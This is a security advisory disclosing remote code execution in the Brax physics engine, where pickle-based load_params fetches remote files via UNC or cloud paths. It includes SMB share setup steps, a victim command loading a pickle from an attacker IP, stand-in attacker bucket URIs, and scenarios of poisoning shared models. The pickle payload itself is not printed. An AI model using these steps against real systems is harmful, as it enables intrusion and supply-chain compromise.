Full Disclosure ID: HA-2026-00123

Brax - Version 0.14.2 / Remote Code Execution (RCE) via Insecure Deserialization

JP
Joshua Provoste Security Researcher
Published June 01, 2026
Severity 9.8 (CRITICAL)
Target Brax / Physics Simulation & Reinforcement Learning

Below is one (1) way to reproduce RCE in Brax using an SMB share controlled by an attacker, without local intervention by a third party to modify files that allow code execution during the deserialization process.

For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).

Note: While this vulnerability is specifically verified and reported on version 0.14.2, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.

Introduction

Brax Logo

Brax is a free, open-source physics engine designed by Google for high-performance simulation of rigid bodies, articulated joints, and contact dynamics. Built entirely on top of JAX, it runs natively on accelerators (GPUs and TPUs) and is optimized for massive parallelization. It is predominantly used in reinforcement learning (RL) and robotics research to train control policies significantly faster than traditional CPU-bound simulators.

The importance of Brax lies in its ability to run millions of simulation steps per second, allowing researchers to evaluate complex robotics and control tasks in a fraction of the time. Because parameter files are commonly shared across collaborative pipelines and research hubs, any security flaw in its data-parsing utilities represents a major vulnerability for the AI research ecosystem.

A1 Simulation
Ant Simulation
Ant v2 Simulation
Fetch Simulation
Grasp Simulation
HalfCheetah Simulation
Humanoid Simulation
Humanoid v2 Simulation
UR5e Simulation

Vulnerability description

An insecure deserialization vulnerability exists in the brax.io.model.load_params function. This utility is designed to load trained model parameters using Python's pickle library. However, pickle is known to be inherently unsafe as it can execute arbitrary Python objects during the reconstruction process.

The security boundary is further bypassed by the integration of the etils.epath library. Unlike standard file-opening functions, epath.Path().open() is backend-agnostic and resolves remote URIs (such as gs://, s3://, or Windows UNC paths \\) if the environment has the corresponding drivers installed. This allows an attacker to supply a path pointing to a remotely hosted malicious .pkl file. When a user or an automated process calls load_params with an untrusted path, the system downloads and deserializes the file, leading to full Remote Code Execution (RCE).

The vulnerable code in brax/io/model.py:

Python (model.py) Vulnerable Loader
def load_params(path: str) -> Any:
  with epath.Path(path).open('rb') as fin:
    buf = fin.read()
  return pickle.loads(buf)

Technical Impact Analysis

Project Purpose & Context

Brax is a differentiable physics engine written in JAX, designed for high-performance Reinforcement Learning (RL) and robotics simulation. It is widely used by researchers and developers at Google and across the global AI community for training complex neural network policies in physics-based environments.

Platform & Deployment Environment

Brax primarily operates in research and development environments, often deployed via Jupyter or Colab notebooks. It is also integrated into large-scale distributed training clusters (using GPUs and TPUs) and MLOps pipelines (e.g., Vertex AI) where model parameters are frequently shared and loaded across different infrastructure components.

Comprehensive Risk Assessment

The vulnerability is rated as Critical. While Brax supports secure checkpointing through Orbax, the brax.io.model module provides a high-convenience pickle-based loading utility that is prominently featured in official tutorials and research workflows. This creates a significant "Supply Chain" and "Remote Control" surface: an attacker can achieve RCE by merely convincing a researcher to load a pre-trained model path, or by influencing a configuration flag in an automated pipeline.

Attack Scenario

Who wants to exploit a particular vulnerability?

Malicious actors targeting AI/ML research institutions, data scientists, or organizations running significant cloud-based simulation infrastructure. This includes attackers seeking to steal intellectual property (proprietary models/datasets) or those looking to hijack expensive compute resources (TPU pods).

For what gain?

The primary gain is arbitrary code execution on high-performance compute nodes. This enables data theft, credential harvesting from environment variables, and lateral movement across research clusters. In cloud environments, it can lead to full compromise of the researcher's workstation or the orchestration layer.

In what way?

Attackers can distribute malicious "optimized" models on platforms like GitHub or Hugging Face, or exploit MLOps systems that accept path parameters from untrusted inputs. By providing a path to a remote share (SMB) or a cloud bucket (GCS/S3), they force the victim's system to act as a client that downloads and executes their payload.

Reproduction steps

On the Raspberry (attacker) - IP 192.168.1.90

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90

Shared Resource Configuration (SMB):

1. Install Samba: sudo apt update && sudo apt install samba samba-common-bin -y.
2. Prepare the attack directory:

mkdir ~/lab_attack
chmod 755 /home/kw0  # Allows Samba to access the HOME
chmod -R 777 ~/lab_attack

3. Configure Samba: Add to the end of /etc/samba/smb.conf:

[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes
force user = kw0

4. **Payload Generation on the Raspberry**: Run the specialized exploit.py script to generate the params.pkl file directly in the shared path:

python exploit.py
Payload generation output

On Windows (victim) - IP 192.168.1.88

PS L:\HTTP_Code_Filleter\OT2\brax> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88

Technical Requirements

  • Operating System: Windows (for native resolution of UNC paths and network drives).
  • Environment: Python 3.x with the core dependencies (brax, etils[epath], jax).
  • Setup: No GPU/TPU is required to reproduce the security flaw, a CPU environment is sufficient.
  • Dependency Installation:
    # orbax-checkpoint < 0.11.33 is required due to uvloop incompatibility on Windows
    pip install "orbax-checkpoint<0.11.33" brax etils[epath] jax

1. **Delete previous network bridge**: net use Z: /delete.
2. **Create the network bridge**:

net use Z: \\192.168.1.90\lab_share /persistent:no

3. **Launch deserialization**:
python -c "from brax.io import model; model.load_params(r'\\192.168.1.90\lab_share\params.pkl')"

Exploit confirmation pop-up

Other RCE vectors in Brax remotely controlled by an attacker

1. File System Abstraction: etils.epath

The most critical entry point is brax.io.model.load_params(path). Unlike a conventional file opening, Brax uses epath.Path(path).open('rb').

Locality Bypass: The etils.epath library is designed to be backend-agnostic. If the environment has the necessary drivers installed (such as tensorflow-io or gcsfs), an attacker can provide remote URIs like gs://malicious-bucket/payload.pkl or s3://attacker-models/exploit.pkl. If a Brax-based application accepts a model path from an API or configuration, the server itself will act as a client, download the payload from the attacker's bucket, and execute it via pickle.loads.

2. Supply Chain Model Poisoning

Brax integrates closely with model repositories like mujoco_menagerie.

The "Pre-trained Model" Vector: Official tutorials explicitly encourage the use of model.load_params to load trained policies. An attacker can publish an "optimized" model in RL communities (GitHub, Hugging Face, etc.). For the user, loading params.pkl is a "data loading" operation, and execution occurs at the moment of loading, compromising the environment.

3. Injection via Configuration Flags (absl-py)

The main training script brax/training/learner.py exposes flags such as --restoredir. In **MLOps** deployments (Kubernetes, Vertex AI), training parameters are often passed through environment variables or dynamically generated CLI arguments. If an attacker can influence the orchestration configuration, they can force the loading of a checkpoint from an arbitrary location.

4. Persistence and Lateral Movement in JAX Clusters

In distributed computing environments (TPU/GPU pods), an attacker who compromises a single node or shared storage (NFS/Cloud Bucket) can replace a parameter .pkl file. When other nodes in the cluster or evaluation processes attempt to load the parameters to continue the simulation, the exploit propagates throughout the cluster, facilitating lateral movement.


Executive Summary: RCE via Insecure Deserialization and UNC Path Injection in Brax

The research identifies a critical Remote Code Execution (RCE) vulnerability in the Brax physics engine (v0.14.2), specifically within its model loading utility.

  • Root Cause: The brax.io.model.load_params function utilizes pickle to deserialize model parameters from file paths. Furthermore, it leverages etils.epath to open these paths, which transparently supports remote protocols including Windows UNC paths (\\) and cloud storage URIs.
  • Exploitation Mechanism: By providing a malicious path pointing to an attacker-controlled SMB share or remote bucket, an attacker can force the Brax engine to fetch and deserialize a crafted pickle payload. This deserialization process executes arbitrary code in the context of the application process.

Analysis of Scope and Security Implications

This vulnerability is of critical severity, as it targets the core data-loading mechanism used in distributed reinforcement learning and physics simulations.

1. Infection Scenarios

  • Supply Chain Poisoning: Attackers can publish "optimized" models on platforms like GitHub or Hugging Face. Researchers following official Brax tutorials to load these models will trigger the RCE implicitly during standard load_params calls.
  • Distributed Training Compromise: In large-scale training clusters, an attacker with access to shared storage (NFS/Cloud Buckets) can replace parameter files. Subsequent nodes or evaluation pipelines attempting to load these parameters will propagate the exploit, enabling massive lateral movement.

2. Factors Exacerbating Risk